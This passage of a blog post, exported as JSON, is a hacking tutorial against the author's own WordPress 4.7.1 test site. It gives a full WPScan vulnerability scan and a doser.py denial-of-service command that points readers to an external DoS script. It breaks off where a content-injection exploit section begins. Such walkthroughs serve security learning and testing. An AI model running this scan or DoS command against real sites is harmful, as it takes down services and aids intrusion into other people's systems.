{"id":1813,"date":"2019-05-27T15:30:06","date_gmt":"2019-05-27T13:30:06","guid":{"rendered":"https:\/\/christeninformatica.ch\/?p=1813"},"modified":"2023-05-09T06:42:52","modified_gmt":"2023-05-09T04:42:52","slug":"guida-sicurezza-hacking-wordpress-content-injection-exploit-dos-wpscan-metasploit","status":"publish","type":"post","link":"https:\/\/christeninformatica.ch\/it\/guida-sicurezza-hacking-wordpress-content-injection-exploit-dos-wpscan-metasploit\/","title":{"rendered":"Hacking WordPress &#8211; Content Injection Exploit and DoS"},"content":{"rendered":"<p>In this example we will &#8220;<b>exploit<\/b>&#8221; some <b>vulnerabilities<\/b> in <b>WordPress<\/b> version 4.7.1. First, scan the site for <b>vulnerabilities<\/b> with <b>WPScan<\/b>.<\/p>\n<h2>Detecting vulnerabilities in WordPress with WPScan<\/h2>\n<div class=\"comandi\">\n<blockquote>\n<pre>workstation:\/home\/chit # wpscan --url http:\/\/chit-test.ch\nWARNING: Nokogiri was built against LibXML version 2.9.9, but has dynamically loaded 2.9.7\n_______________________________________________________________\n        __          _______   _____\n        \\ \\        \/ \/  __ \\ \/ ____|\n         \\ \\  \/\\  \/ \/| |__) | (___   ___  __ _ _ __ \u00ae\n          \\ \\\/  \\\/ \/ |  ___\/ \\___ \\ \/ __|\/ _` | '_ \\\n           \\  \/\\  \/  | |     ____) | (__| (_| | | | |\n            \\\/  \\\/   |_|    |_____\/ \\___|\\__,_|_| |_|\n\n        WordPress Security Scanner by the WPScan Team\n                       Version 3.4.3\n          Sponsored by Sucuri - https:\/\/sucuri.net\n      @_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_\n_______________________________________________________________\n\n[i] It seems like you have not updated the database for some time.\n[?] Do you want to update now? 
[Y]es [N]o, default: [N]Y\n[i] Updating the Database ...\n[i] Update completed.\n\n[+] URL: http:\/\/chit-test.ch\/\n[+] Started: Wed May 22 18:07:18 2019\n\nInteresting Finding(s):\n\n[+] http:\/\/chit-test.ch\/\n | Interesting Entry: Server: Apache\n | Found By: Headers (Passive Detection)\n | Confidence: 100%\n\n[+] WordPress version 4.7.1 identified (Insecure, released on 2017-01-11).\n | Detected By: Rss Generator (Passive Detection)\n |  - http:\/\/chit-test.ch\/?feed=rss2, https:\/\/wordpress.org\/?v=4.7.1\n |  - http:\/\/chit-test.ch\/?feed=comments-rss2, https:\/\/wordpress.org\/?v=4.7.1\n |\n | [!] 44 vulnerabilities identified:\n |\n | [!] Title: WordPress 4.2.0-4.7.1 - Press This UI Available to Unauthorised Users\n |     Fixed in: 4.7.2\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/8729\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2017-5610\n |      - https:\/\/wordpress.org\/news\/2017\/01\/wordpress-4-7-2-security-release\/\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/21264a31e0849e6ff793a06a17de877dd88ea454\n |\n | [!] Title: WordPress 3.5-4.7.1 - WP_Query SQL Injection\n |     Fixed in: 4.7.2\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/8730\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2017-5611\n |      - https:\/\/wordpress.org\/news\/2017\/01\/wordpress-4-7-2-security-release\/\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/85384297a60900004e27e417eac56d24267054cb\n |\n | [!] 
Title: WordPress 4.3.0-4.7.1 - Cross-Site Scripting (XSS) in posts list table\n |     Fixed in: 4.7.2\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/8731\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2017-5612\n |      - https:\/\/wordpress.org\/news\/2017\/01\/wordpress-4-7-2-security-release\/\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/4482f9207027de8f36630737ae085110896ea849\n |\n | [!] Title: WordPress 4.7.0-4.7.1 - Unauthenticated Page\/Post Content Modification via REST API\n |     Fixed in: 4.7.2\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/8734\n |      - https:\/\/blog.sucuri.net\/2017\/02\/content-injection-vulnerability-wordpress-rest-api.html\n |      - https:\/\/blogs.akamai.com\/2017\/02\/wordpress-web-api-vulnerability.html\n |      - https:\/\/gist.github.com\/leonjza\/2244eb15510a0687ed93160c623762ab\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/e357195ce303017d517aff944644a7a1232926f7\n |      - https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/scanner\/http\/wordpress_content_injection\n |\n | [!] Title: WordPress 3.6.0-4.7.2 - Authenticated Cross-Site Scripting (XSS) via Media File Metadata\n |     Fixed in: 4.7.3\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/8765\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2017-6814\n |      - https:\/\/wordpress.org\/news\/2017\/03\/wordpress-4-7-3-security-and-maintenance-release\/\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/28f838ca3ee205b6f39cd2bf23eb4e5f52796bd7\n |      - https:\/\/sumofpwn.nl\/advisory\/2016\/wordpress_audio_playlist_functionality_is_affected_by_cross_site_scripting.html\n |      - http:\/\/seclists.org\/oss-sec\/2017\/q1\/563\n |\n | [!] 
Title: WordPress 2.8.1-4.7.2 - Control Characters in Redirect URL Validation\n |     Fixed in: 4.7.3\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/8766\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2017-6815\n |      - https:\/\/wordpress.org\/news\/2017\/03\/wordpress-4-7-3-security-and-maintenance-release\/\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/288cd469396cfe7055972b457eb589cea51ce40e\n |\n | [!] Title: WordPress 4.7.0-4.7.2 - Authenticated Unintended File Deletion in Plugin Delete\n |     Fixed in: 4.7.3\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/8767\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2017-6816\n |      - https:\/\/wordpress.org\/news\/2017\/03\/wordpress-4-7-3-security-and-maintenance-release\/\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/4d80f8b3e1b00a3edcee0774dc9c2f4c78f9e663\n |\n | [!] Title: WordPress  4.0-4.7.2 - Authenticated Stored Cross-Site Scripting (XSS) in YouTube URL Embeds\n |     Fixed in: 4.7.3\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/8768\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2017-6817\n |      - https:\/\/wordpress.org\/news\/2017\/03\/wordpress-4-7-3-security-and-maintenance-release\/\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/419c8d97ce8df7d5004ee0b566bc5e095f0a6ca8\n |      - https:\/\/blog.sucuri.net\/2017\/03\/stored-xss-in-wordpress-core.html\n |\n | [!] 
Title: WordPress 4.7-4.7.2 - Cross-Site Scripting (XSS) via Taxonomy Term Names\n |     Fixed in: 4.7.3\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/8769\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2017-6818\n |      - https:\/\/wordpress.org\/news\/2017\/03\/wordpress-4-7-3-security-and-maintenance-release\/\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/9092fd01e1f452f37c313d38b18f9fe6907541f9\n |\n | [!] Title: WordPress 4.2-4.7.2 - Press This CSRF DoS\n |     Fixed in: 4.7.3\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/8770\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2017-6819\n |      - https:\/\/wordpress.org\/news\/2017\/03\/wordpress-4-7-3-security-and-maintenance-release\/\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/263831a72d08556bc2f3a328673d95301a152829\n |      - https:\/\/sumofpwn.nl\/advisory\/2016\/cross_site_request_forgery_in_wordpress_press_this_function_allows_dos.html\n |      - http:\/\/seclists.org\/oss-sec\/2017\/q1\/562\n |      - https:\/\/hackerone.com\/reports\/153093\n |\n | [!] Title: WordPress 2.3-4.8.3 - Host Header Injection in Password Reset\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/8807\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2017-8295\n |      - https:\/\/exploitbox.io\/vuln\/WordPress-Exploit-4-7-Unauth-Password-Reset-0day-CVE-2017-8295.html\n |      - http:\/\/blog.dewhurstsecurity.com\/2017\/05\/04\/exploitbox-wordpress-security-advisories.html\n |      - https:\/\/core.trac.wordpress.org\/ticket\/25239\n |\n | [!] 
Title: WordPress 2.7.0-4.7.4 - Insufficient Redirect Validation\n |     Fixed in: 4.7.5\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/8815\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2017-9066\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/76d77e927bb4d0f87c7262a50e28d84e01fd2b11\n |      - https:\/\/wordpress.org\/news\/2017\/05\/wordpress-4-7-5\/\n |\n | [!] Title: WordPress 2.5.0-4.7.4 - Post Meta Data Values Improper Handling in XML-RPC\n |     Fixed in: 4.7.5\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/8816\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2017-9062\n |      - https:\/\/wordpress.org\/news\/2017\/05\/wordpress-4-7-5\/\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/3d95e3ae816f4d7c638f40d3e936a4be19724381\n |\n | [!] Title: WordPress 3.4.0-4.7.4 - XML-RPC Post Meta Data Lack of Capability Checks \n |     Fixed in: 4.7.5\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/8817\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2017-9065\n |      - https:\/\/wordpress.org\/news\/2017\/05\/wordpress-4-7-5\/\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/e88a48a066ab2200ce3091b131d43e2fab2460a4\n |\n | [!] Title: WordPress 2.5.0-4.7.4 - Filesystem Credentials Dialog CSRF\n |     Fixed in: 4.7.5\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/8818\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2017-9064\n |      - https:\/\/wordpress.org\/news\/2017\/05\/wordpress-4-7-5\/\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/38347d7c580be4cdd8476e4bbc653d5c79ed9b67\n |      - https:\/\/sumofpwn.nl\/advisory\/2016\/cross_site_request_forgery_in_wordpress_connection_information.html\n |\n | [!] 
Title: WordPress 3.3-4.7.4 - Large File Upload Error XSS\n |     Fixed in: 4.7.5\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/8819\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2017-9061\n |      - https:\/\/wordpress.org\/news\/2017\/05\/wordpress-4-7-5\/\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/8c7ea71edbbffca5d9766b7bea7c7f3722ffafa6\n |      - https:\/\/hackerone.com\/reports\/203515\n |      - https:\/\/hackerone.com\/reports\/203515\n |\n | [!] Title: WordPress 3.4.0-4.7.4 - Customizer XSS &amp; CSRF\n |     Fixed in: 4.7.5\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/8820\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2017-9063\n |      - https:\/\/wordpress.org\/news\/2017\/05\/wordpress-4-7-5\/\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/3d10fef22d788f29aed745b0f5ff6f6baea69af3\n |\n | [!] Title: WordPress 2.3.0-4.8.1 - $wpdb-&gt;prepare() potential SQL Injection\n |     Fixed in: 4.7.6\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/8905\n |      - https:\/\/wordpress.org\/news\/2017\/09\/wordpress-4-8-2-security-and-maintenance-release\/\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/70b21279098fc973eae803693c0705a548128e48\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/fc930d3daed1c3acef010d04acc2c5de93cd18ec\n |\n | [!] Title: WordPress 2.3.0-4.7.4 - Authenticated SQL injection\n |     Fixed in: 4.7.5\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/8906\n |      - https:\/\/medium.com\/websec\/wordpress-sqli-bbb2afcc8e94\n |      - https:\/\/wordpress.org\/news\/2017\/09\/wordpress-4-8-2-security-and-maintenance-release\/\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/70b21279098fc973eae803693c0705a548128e48\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/8905\n |\n | [!] 
Title: WordPress 2.9.2-4.8.1 - Open Redirect\n |     Fixed in: 4.7.6\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/8910\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2017-14725\n |      - https:\/\/wordpress.org\/news\/2017\/09\/wordpress-4-8-2-security-and-maintenance-release\/\n |      - https:\/\/core.trac.wordpress.org\/changeset\/41398\n |\n | [!] Title: WordPress 3.0-4.8.1 - Path Traversal in Unzipping\n |     Fixed in: 4.7.6\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/8911\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2017-14719\n |      - https:\/\/wordpress.org\/news\/2017\/09\/wordpress-4-8-2-security-and-maintenance-release\/\n |      - https:\/\/core.trac.wordpress.org\/changeset\/41457\n |\n | [!] Title: WordPress 4.4-4.8.1 - Path Traversal in Customizer \n |     Fixed in: 4.7.6\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/8912\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2017-14722\n |      - https:\/\/wordpress.org\/news\/2017\/09\/wordpress-4-8-2-security-and-maintenance-release\/\n |      - https:\/\/core.trac.wordpress.org\/changeset\/41397\n |\n | [!] Title: WordPress 4.4-4.8.1 - Cross-Site Scripting (XSS) in oEmbed\n |     Fixed in: 4.7.6\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/8913\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2017-14724\n |      - https:\/\/wordpress.org\/news\/2017\/09\/wordpress-4-8-2-security-and-maintenance-release\/\n |      - https:\/\/core.trac.wordpress.org\/changeset\/41448\n |\n | [!] 
Title: WordPress 4.2.3-4.8.1 - Authenticated Cross-Site Scripting (XSS) in Visual Editor\n |     Fixed in: 4.7.6\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/8914\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2017-14726\n |      - https:\/\/wordpress.org\/news\/2017\/09\/wordpress-4-8-2-security-and-maintenance-release\/\n |      - https:\/\/core.trac.wordpress.org\/changeset\/41395\n |      - https:\/\/blog.sucuri.net\/2017\/09\/stored-cross-site-scripting-vulnerability-in-wordpress-4-8-1.html\n |\n | [!] Title: WordPress &lt;= 4.8.2 - $wpdb-&gt;prepare() Weakness\n |     Fixed in: 4.7.7\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/8941\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2017-16510\n |      - https:\/\/wordpress.org\/news\/2017\/10\/wordpress-4-8-3-security-release\/\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/a2693fd8602e3263b5925b9d799ddd577202167d\n |      - https:\/\/twitter.com\/ircmaxell\/status\/923662170092638208\n |      - https:\/\/blog.ircmaxell.com\/2017\/10\/disclosure-wordpress-wpdb-sql-injection-technical.html\n |\n | [!] Title: WordPress 2.8.6-4.9 - Authenticated JavaScript File Upload\n |     Fixed in: 4.7.8\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/8966\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2017-17092\n |      - https:\/\/wordpress.org\/news\/2017\/11\/wordpress-4-9-1-security-and-maintenance-release\/\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/67d03a98c2cae5f41843c897f206adde299b0509\n |\n | [!] 
Title: WordPress 1.5.0-4.9 - RSS and Atom Feed Escaping\n |     Fixed in: 4.7.8\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/8967\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2017-17094\n |      - https:\/\/wordpress.org\/news\/2017\/11\/wordpress-4-9-1-security-and-maintenance-release\/\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/f1de7e42df29395c3314bf85bff3d1f4f90541de\n |\n | [!] Title: WordPress 4.3.0-4.9 - HTML Language Attribute Escaping\n |     Fixed in: 4.7.8\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/8968\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2017-17093\n |      - https:\/\/wordpress.org\/news\/2017\/11\/wordpress-4-9-1-security-and-maintenance-release\/\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/3713ac5ebc90fb2011e98dfd691420f43da6c09a\n |\n | [!] Title: WordPress 3.7-4.9 - 'newbloguser' Key Weak Hashing\n |     Fixed in: 4.7.8\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/8969\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2017-17091\n |      - https:\/\/wordpress.org\/news\/2017\/11\/wordpress-4-9-1-security-and-maintenance-release\/\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/eaf1cfdc1fe0bdffabd8d879c591b864d833326c\n |\n | [!] Title: WordPress 3.7-4.9.1 - MediaElement Cross-Site Scripting (XSS)\n |     Fixed in: 4.7.9\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/9006\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2018-5776\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/3fe9cb61ee71fcfadb5e002399296fcc1198d850\n |      - https:\/\/wordpress.org\/news\/2018\/01\/wordpress-4-9-2-security-and-maintenance-release\/\n |      - https:\/\/core.trac.wordpress.org\/ticket\/42720\n |\n | [!] 
Title: WordPress &lt;= 4.9.4 - Application Denial of Service (DoS) (unpatched)\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/9021\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2018-6389\n |      - https:\/\/baraktawily.blogspot.fr\/2018\/02\/how-to-dos-29-of-world-wide-websites.html\n |      - https:\/\/github.com\/quitten\/doser.py\n |      - https:\/\/thehackernews.com\/2018\/02\/wordpress-dos-exploit.html\n |\n | [!] Title: WordPress 3.7-4.9.4 - Remove localhost Default\n |     Fixed in: 4.7.10\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/9053\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2018-10101\n |      - https:\/\/wordpress.org\/news\/2018\/04\/wordpress-4-9-5-security-and-maintenance-release\/\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/804363859602d4050d9a38a21f5a65d9aec18216\n |\n | [!] Title: WordPress 3.7-4.9.4 - Use Safe Redirect for Login\n |     Fixed in: 4.7.10\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/9054\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2018-10100\n |      - https:\/\/wordpress.org\/news\/2018\/04\/wordpress-4-9-5-security-and-maintenance-release\/\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/14bc2c0a6fde0da04b47130707e01df850eedc7e\n |\n | [!] Title: WordPress 3.7-4.9.4 - Escape Version in Generator Tag\n |     Fixed in: 4.7.10\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/9055\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2018-10102\n |      - https:\/\/wordpress.org\/news\/2018\/04\/wordpress-4-9-5-security-and-maintenance-release\/\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/31a4369366d6b8ce30045d4c838de2412c77850d\n |\n | [!] 
Title: WordPress &lt;= 4.9.6 - Authenticated Arbitrary File Deletion\n |     Fixed in: 4.7.11\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/9100\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2018-12895\n |      - https:\/\/blog.ripstech.com\/2018\/wordpress-file-delete-to-code-execution\/\n |      - http:\/\/blog.vulnspy.com\/2018\/06\/27\/Wordpress-4-9-6-Arbitrary-File-Delection-Vulnerbility-Exploit\/\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/c9dce0606b0d7e6f494d4abe7b193ac046a322cd\n |      - https:\/\/wordpress.org\/news\/2018\/07\/wordpress-4-9-7-security-and-maintenance-release\/\n |      - https:\/\/www.wordfence.com\/blog\/2018\/07\/details-of-an-additional-file-deletion-vulnerability-patched-in-wordpress-4-9-7\/\n |\n | [!] Title: WordPress &lt;= 5.0 - Authenticated File Delete\n |     Fixed in: 4.7.12\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/9169\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2018-20147\n |      - https:\/\/wordpress.org\/news\/2018\/12\/wordpress-5-0-1-security-release\/\n |\n | [!] Title: WordPress &lt;= 5.0 - Authenticated Post Type Bypass\n |     Fixed in: 4.7.12\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/9170\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2018-20152\n |      - https:\/\/wordpress.org\/news\/2018\/12\/wordpress-5-0-1-security-release\/\n |      - https:\/\/blog.ripstech.com\/2018\/wordpress-post-type-privilege-escalation\/\n |\n | [!] Title: WordPress &lt;= 5.0 - PHP Object Injection via Meta Data\n |     Fixed in: 4.7.12\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/9171\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2018-20148\n |      - https:\/\/wordpress.org\/news\/2018\/12\/wordpress-5-0-1-security-release\/\n |\n | [!] 
Title: WordPress &lt;= 5.0 - Authenticated Cross-Site Scripting (XSS)\n |     Fixed in: 4.7.12\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/9172\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2018-20153\n |      - https:\/\/wordpress.org\/news\/2018\/12\/wordpress-5-0-1-security-release\/\n |\n | [!] Title: WordPress &lt;= 5.0 - Cross-Site Scripting (XSS) that could affect plugins\n |     Fixed in: 4.7.12\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/9173\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2018-20150\n |      - https:\/\/wordpress.org\/news\/2018\/12\/wordpress-5-0-1-security-release\/\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/fb3c6ea0618fcb9a51d4f2c1940e9efcd4a2d460\n |\n | [!] Title: WordPress &lt;= 5.0 - User Activation Screen Search Engine Indexing\n |     Fixed in: 4.7.12\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/9174\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2018-20151\n |      - https:\/\/wordpress.org\/news\/2018\/12\/wordpress-5-0-1-security-release\/\n |\n | [!] Title: WordPress &lt;= 5.0 - File Upload to XSS on Apache Web Servers\n |     Fixed in: 4.7.12\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/9175\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2018-20149\n |      - https:\/\/wordpress.org\/news\/2018\/12\/wordpress-5-0-1-security-release\/\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/246a70bdbfac3bd45ff71c7941deef1bb206b19a\n |\n | [!] Title: WordPress 3.7-5.0 (except 4.9.9) - Authenticated Code Execution\n |     Fixed in: 5.0.1\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/9222\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2019-8942\n |      - https:\/\/blog.ripstech.com\/2019\/wordpress-image-remote-code-execution\/\n |\n | [!] 
Title: WordPress 3.9-5.1 - Comment Cross-Site Scripting (XSS)\n |     Fixed in: 4.7.13\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/9230\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2019-9787\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/0292de60ec78c5a44956765189403654fe4d080b\n |      - https:\/\/wordpress.org\/news\/2019\/03\/wordpress-5-1-1-security-and-maintenance-release\/\n |      - https:\/\/blog.ripstech.com\/2019\/wordpress-csrf-to-rce\/\n\n[+] WordPress theme in use: twentyseventeen\n | Location: http:\/\/chit-test.ch\/wp-content\/themes\/twentyseventeen\/\n | Last Updated: 2019-05-07T00:00:00.000Z\n | Readme: http:\/\/chit-test.ch\/wp-content\/themes\/twentyseventeen\/README.txt\n | [!] The version is out of date, the latest version is 2.2\n | Style URL: http:\/\/chit-test.ch\/wp-content\/themes\/twentyseventeen\/style.css?ver=4.7.1\n | Style Name: Twenty Seventeen\n | Style URI: https:\/\/wordpress.org\/themes\/twentyseventeen\/\n | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. 
With a fo...\n | Author: the WordPress team\n | Author URI: https:\/\/wordpress.org\/\n |\n | Detected By: Css Style (Passive Detection)\n |\n | Version: 1.1 (80% confidence)\n | Detected By: Style (Passive Detection)\n |  - http:\/\/chit-test.ch\/wp-content\/themes\/twentyseventeen\/style.css?ver=4.7.1, Match: 'Version: 1.1'\n\n[+] Enumerating All Plugins\n\n[i] No plugins Found.\n\n[+] Enumerating Config Backups\n Checking Config Backups - Time: 00:00:00 &lt;====================================================&gt; (21 \/ 21) 100.00% Time: 00:00:00\n\n[i] No Config Backups Found.\n\n[+] Finished: Wed May 22 18:07:21 2019\n[+] Requests Done: 70\n[+] Cached Requests: 4\n[+] Data Sent: 10.706 KB\n[+] Data Received: 23.486 MB\n[+] Memory used: 72.094 MB\n[+] Elapsed time: 00:00:02\nworkstation:\/home\/chit #\n\n<\/pre>\n<\/blockquote>\n<\/div>\n<p>As the output shows, <b>WPScan<\/b> detected 44 <b>vulnerabilities<\/b>.<\/p>\n<h2>WordPress Application Denial of Service (DoS)<\/h2>\n<p>Let us now take a look at one <b>vulnerability<\/b> found by <b>WPScan<\/b>: a <b>DoS attack<\/b> against the application (<b>WordPress<\/b>).<\/p>\n<div class=\"comandi\">\n<blockquote>\n<pre> | [!] 
Title: WordPress &lt;= 4.9.4 - Application Denial of Service (DoS) (unpatched)\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/9021\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2018-6389\n |      - https:\/\/baraktawily.blogspot.fr\/2018\/02\/how-to-dos-29-of-world-wide-websites.html\n |      - https:\/\/github.com\/quitten\/doser.py\n |      - https:\/\/thehackernews.com\/2018\/02\/wordpress-dos-exploit.html\n<\/pre>\n<\/blockquote>\n<\/div>\n<p>With this kind of <b>DoS attack<\/b> a single &#8220;attacker&#8221; would be enough to make the site unreachable, something normally achieved with a <b>DDoS<\/b> attack, in which the attack comes from many hosts at once.<\/p>\n<p>As you can see, <b>WPScan<\/b> always provides very useful links about the <b>vulnerabilities<\/b> it finds.<\/p>\n<p>For more information about this <b>vulnerability<\/b>, take a look at the following link provided by <b>WPScan<\/b>: <a href=\"https:\/\/thehackernews.com\/2018\/02\/wordpress-dos-exploit.html\" target=\"_blank\" rel=\"noopener noreferrer\">https:\/\/thehackernews.com\/2018\/02\/wordpress-dos-exploit.html<\/a>.<\/p>\n<p>To test this type of attack, download the doser.py program from the following link, found among the information provided by <b>WPScan<\/b>: <a href=\"https:\/\/github.com\/quitten\/doser.py\" target=\"_blank\" rel=\"noopener noreferrer\">https:\/\/github.com\/quitten\/doser.py<\/a>.<\/p>\n<p>Once the program has been downloaded, run it as follows:<\/p>\n<div class=\"comandi\">\n<blockquote>\n<pre>user@workstation:~\/Programmi\/doser.py-master&gt; python doser.py -t 999 -g http:\/\/chit-test.ch\n<\/pre>\n<\/blockquote>\n<\/div>\n<p><img decoding=\"async\" src=\"..\/..\/..\/grafica\/wordpress-hacking-exploit-dos-attack-doser.jpg\" alt=\"WordPress Hacking - DoS Attack\"><\/p>\n<h2>Unauthenticated Page\/Post Content Modification via REST API<\/h2>\n<p>With this <b>exploit<\/b> it is 
